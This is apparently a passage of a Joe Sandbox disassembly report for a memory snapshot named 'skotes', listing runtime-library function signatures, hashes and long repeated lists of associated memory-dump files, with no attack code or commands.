                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _wcsrchr
                                                                                                                                            • String ID: .bat$.cmd$.com$.exe
                                                                                                                                            • API String ID: 1752292252-4019086052
                                                                                                                                            • Opcode ID: a5a4b3a46fb655d0622c6a1ce45fdc27a2952ecc9d925b44a2e9ee21431eea7f
                                                                                                                                            • Instruction ID: 779ff75265ad80483f288a879c404157a4ab8adf0c6f4f370ba20ac1dce6456d
                                                                                                                                            • Opcode Fuzzy Hash: a5a4b3a46fb655d0622c6a1ce45fdc27a2952ecc9d925b44a2e9ee21431eea7f
                                                                                                                                            • Instruction Fuzzy Hash: 36012B27B1862E35661412D8DE027BF17D88BC6BB4715012AFE54FB2D1DF54DC8221A0
                                                                                                                                            APIs
                                                                                                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00ADFB06
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
                                                                                                                                            • String ID: GetCurrentProcessorNumberEx$GetThreadGroupAffinity$SetThreadGroupAffinity$kernel32.dll
                                                                                                                                            • API String ID: 348560076-465693683
                                                                                                                                            • Opcode ID: 0332e70f0c6ff3812b2d181923221370227127b4bfffe28331b19084e9358255
                                                                                                                                            • Instruction ID: 9ef3e24091c68cac68811a1c6c01cba2916bc7cecb9b5f930a2f818083058b26
                                                                                                                                            • Opcode Fuzzy Hash: 0332e70f0c6ff3812b2d181923221370227127b4bfffe28331b19084e9358255
                                                                                                                                            • Instruction Fuzzy Hash: A701F5766923156D5320B7B95C8BDEB35EC8E02780760097BB903E32A2EDE5D8414160
                                                                                                                                            APIs
                                                                                                                                            • StructuredWorkStealingQueue.LIBCMT ref: 00AF20B7
                                                                                                                                              • Part of subcall function 00AECAF3: Mailbox.LIBCMT ref: 00AECB2D
                                                                                                                                            • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00AF20C8
                                                                                                                                            • StructuredWorkStealingQueue.LIBCMT ref: 00AF20FE
                                                                                                                                            • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00AF210F
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Work$Concurrency::details::ItemItem::QueueStealingStructured$Mailbox
                                                                                                                                            • String ID: e
                                                                                                                                            • API String ID: 1411586358-4024072794
                                                                                                                                            • Opcode ID: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
                                                                                                                                            • Instruction ID: 92c2ff60b8bbdab898841ab3f54f0c6fa6d43cb3a8759aea7cceb0a7f6817485
                                                                                                                                            • Opcode Fuzzy Hash: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
                                                                                                                                            • Instruction Fuzzy Hash: C311913210110DABDB15DFA9C9817BA73A5EF02364B14826AFE06DF242DF71DD05CB99
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            • WakeAllConditionVariable, xrefs: 00ADD069
                                                                                                                                            • SleepConditionVariableCS, xrefs: 00ADD05D
                                                                                                                                            • kernel32.dll, xrefs: 00ADD04C
                                                                                                                                            • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00ADD03B
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ___scrt_fastfail
                                                                                                                                            • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                            • API String ID: 2964418898-3242537097
                                                                                                                                            • Opcode ID: 2278f856746eb8a7b143d9f3e25fa270b1df645f312efc7d916cf1639ef9df6f
                                                                                                                                            • Instruction ID: d5377c8b333cf51d503aedf93cda8da228e79f82c3fe311dc520a718034d6be5
                                                                                                                                            • Opcode Fuzzy Hash: 2278f856746eb8a7b143d9f3e25fa270b1df645f312efc7d916cf1639ef9df6f
                                                                                                                                            • Instruction Fuzzy Hash: 3501A221BE2721AAA63137796C0DEAB31D88F82B80F451A52AD02F37A0DDF0CD0345B1
                                                                                                                                            APIs
                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 00B04C98
                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 00B04D5E
                                                                                                                                            • __freea.LIBCMT ref: 00B04DCA
                                                                                                                                              • Part of subcall function 00AFB04B: RtlAllocateHeap.NTDLL(00000000,E6CEA310,?,?,00ADD3FC,E6CEA310,?,00AD7A8B,?,?,?,?,?,?,00AC7465,?), ref: 00AFB07E
                                                                                                                                            • __freea.LIBCMT ref: 00B04DD3
                                                                                                                                            • __freea.LIBCMT ref: 00B04DF6
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1423051803-0
                                                                                                                                            • Opcode ID: bc930d64c716d26807dcc985a257450bdf0b9d92aeecde74c7843a0a2e77ad85
                                                                                                                                            • Instruction ID: a45a8449f435783c2c66561b2a58ac53a4795203963a80a8ea1ff228c1539180
                                                                                                                                            • Opcode Fuzzy Hash: bc930d64c716d26807dcc985a257450bdf0b9d92aeecde74c7843a0a2e77ad85
